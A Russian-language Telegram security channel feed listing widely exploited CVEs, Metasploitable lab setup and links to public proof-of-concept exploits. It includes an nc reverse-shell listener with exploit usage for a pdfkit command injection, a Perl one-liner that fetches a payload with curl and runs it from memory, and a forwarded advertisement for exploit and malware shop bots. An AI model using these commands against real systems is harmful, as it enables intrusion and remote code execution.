Топ 15 более используемых уязвимостей в 2к22:
1. Log4Shell (CVE-2021-44228)
2. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
3. ProxyShell (CVE-2021-31207
4. CVE-2021-34473
5. CVE-2021-34523)
6–9. ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
10. Server/Data Center Atlassian Confluence (CVE-2021-26084)
11. Уязвимость VMware vSphere (CVE-2021-21972)
12. ZeroLogon (CVE-2020-1472)
13. Сервер Microsoft Exchange (CVE-2020-0688)
14. Pulse Secure Pulse Connect Secure (CVE-2019-11510)
15. Fortinet FortiOS и FortiProxy (CVE-2018-13379)
Подробнее: тык
#новости #CVE
1. Log4Shell (CVE-2021-44228)
2. Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)
3. ProxyShell (CVE-2021-31207
4. CVE-2021-34473
5. CVE-2021-34523)
6–9. ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
10. Server/Data Center Atlassian Confluence (CVE-2021-26084)
11. Уязвимость VMware vSphere (CVE-2021-21972)
12. ZeroLogon (CVE-2020-1472)
13. Сервер Microsoft Exchange (CVE-2020-0688)
14. Pulse Secure Pulse Connect Secure (CVE-2019-11510)
15. Fortinet FortiOS и FortiProxy (CVE-2018-13379)
Подробнее: тык
#новости #CVE
👍6🔥2🐳1
На досуге можно заняться полезным делом и, например, потрениться/поучиться навыкам взлома благодаря Metasploitable
Но для него нужен Virtual Box:
Теперь давайте установим сам Metasploitable:
https://sourceforge.net/projects/metasploitable/
Далее закидываем соответствующий файл в VB и наслаждаемся)
P.S. если нужна будет помощь в установке- милости прошу в комментарии
#полезные_материалы #CVE #новости
Но для него нужен Virtual Box:
apt-get install virtualbox-dkms
virtualbox
*На винде он тоже есть*Теперь давайте установим сам Metasploitable:
https://sourceforge.net/projects/metasploitable/
Далее закидываем соответствующий файл в VB и наслаждаемся)
P.S. если нужна будет помощь в установке- милости прошу в комментарии
#полезные_материалы #CVE #новости
👍6
PoC для уязвимости CVE-2022-40684 (Fortinet RCE)
Данная уязвимость затрагивает брандмауэры FortiGate, веб-прокси FortiProxy, а также FortiSwitch Manager и оценивается в 9,6 балла из 10 возможных по шкале CVSS. Позволяет осуществить полный обход аутентификации.
Подробнее: тык
#CVE
Данная уязвимость затрагивает брандмауэры FortiGate, веб-прокси FortiProxy, а также FortiSwitch Manager и оценивается в 9,6 балла из 10 возможных по шкале CVSS. Позволяет осуществить полный обход аутентификации.
Подробнее: тык
#CVE
GitHub
GitHub - carlosevieira/CVE-2022-40684: PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only) - carlosevieira/CVE-2022-40684
👍3
MacDirtyCowDem
Получаем root в macOS 13.0.1 через CVE-2022-46689
Подробнее: https://github.com/zhuowei/MacDirtyCowDemo
#CVE
Получаем root в macOS 13.0.1 через CVE-2022-46689
Подробнее: https://github.com/zhuowei/MacDirtyCowDemo
#CVE
👍2
Теперь на канале настроена удобная навигация по категориям постов, которые будут находиться в этом закрепленном сообщении и описании канала🔥
#райтап
#hack_the_box
#новости
#CVE
#полезные_материалы
#литература
#софт
#termux
#райтап
#hack_the_box
#новости
#CVE
#полезные_материалы
#литература
#софт
#termux
🔥4👍3❤2
CVE-2023-21752 aka уязвимость удаления произвольного файла в службе резервного копирования Windows
Уязвимость, обнаруженная в службе резервного копирования Windows 10 января 2023 года, позволяет провести эскалацию привилегий user до system
Этот репозиторий содержит два эксплойта:
1. Удаление файла на выбор
2. Злоупотребление удалением произвольной формы, чтобы создать оболочку cmd с повышенными правами
Демонстрация уязвимости: https://github.com/Wh04m1001/CVE-2023-21752
Об уязвимости: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752
#CVE #полезные_материалы
Уязвимость, обнаруженная в службе резервного копирования Windows 10 января 2023 года, позволяет провести эскалацию привилегий user до system
Этот репозиторий содержит два эксплойта:
1. Удаление файла на выбор
2. Злоупотребление удалением произвольной формы, чтобы создать оболочку cmd с повышенными правами
Демонстрация уязвимости: https://github.com/Wh04m1001/CVE-2023-21752
Об уязвимости: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21752
#CVE #полезные_материалы
GitHub
GitHub - Wh04m1001/CVE-2023-21752
Contribute to Wh04m1001/CVE-2023-21752 development by creating an account on GitHub.
👍7
Общедоступная коллекция CVE и эксплойтов в студию🔥
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
Во вкладках с некоторыми эксплойтами есть how to use для самых маленьких😁
https://github.com/jhftss/POC
#CVE #полезные_материалы
GitHub
GitHub - jhftss/POC: A public collection of POCs & Exploits for the vulnerabilities I discovered
A public collection of POCs & Exploits for the vulnerabilities I discovered - jhftss/POC
🔥5👍1
Гигантская коллекция почти каждого общедоступного CVE PoC
Подробнее: https://github.com/trickest/cve
#CVE #полезные_материалы #литература
Подробнее: https://github.com/trickest/cve
#CVE #полезные_материалы #литература
GitHub
GitHub - trickest/cve: Gather and update all available and newest CVEs with their PoC.
Gather and update all available and newest CVEs with their PoC. - trickest/cve
👍2🍓2🔥1
CVE-2023-25136 Proof-of-Concept
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению
Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
DoS-доказательство концепции двойного освобождения OpenSSH 9.1p1 CVE-2023-25136.
Это вызовет двойное освобождение и приведет к аварийному завершению
Подробнее: https://github.com/jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
#CVE
GitHub
GitHub - jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free
Contribute to jfrog/jfrog-CVE-2023-25136-OpenSSH_Double-Free development by creating an account on GitHub.
👍3
PDFkit-CMD-Injection (CVE-2022-25765)
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
GitHub
GitHub - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765
❤4👍1
Forwarded from Похек (Сергей Зыбнев)
This media is not supported in your browser
VIEW IN TELEGRAM
Анализ новой уязвимости в Linux в nf_tables и продвинутые методы ее эксплуатации
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
➡️ Writeup CVE
➡️ Github PoC
🌚 @poxek
CVE-2024-1086
#CVE #linux #privesc
PoC для повышения привилегий CVE-2024-1086, работающий на большинстве ядер Linux между v5.14 и v6.6, включая Debian, Ubuntu и KernelCTF. Процент успеха составляет 99,4 % на образах KernelCTF.
PoC:
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make
./exploit
Также автор позаботился о нас, пентестерах, и предлагает fileless эксплуатацию:
perl -e '
require qw/syscall.ph/;
my $fd = syscall(SYS_memfd_create(), $fn, 0);
system "curl https://example.com/exploit -s >&$fd";
exec {"/proc/$$/fd/$fd"} "memfd";
'
Если вам интересно углубиться в эту CVE, то автор написал неплохой райтап по тому, как он изучал эту CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4👍2🔥2
Forwarded from Exploit Service
Proof of Concept (PoC) for #CVE-2024-23334, demonstrating how #malicious actors can exploit vulnerabilities in aiohttp using #LFI .
https://github.com/jhonnybonny/CVE-2024-23334
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
https://github.com/jhonnybonny/CVE-2024-23334
Private: @ExploitServiceBot
Malware Shop: @MalwareShopBot
All projects @MalwareLinks
GitHub
GitHub - jhonnybonny/CVE-2024-23334: aiohttp LFI (CVE-2024-23334)
aiohttp LFI (CVE-2024-23334). Contribute to jhonnybonny/CVE-2024-23334 development by creating an account on GitHub.
❤4❤🔥1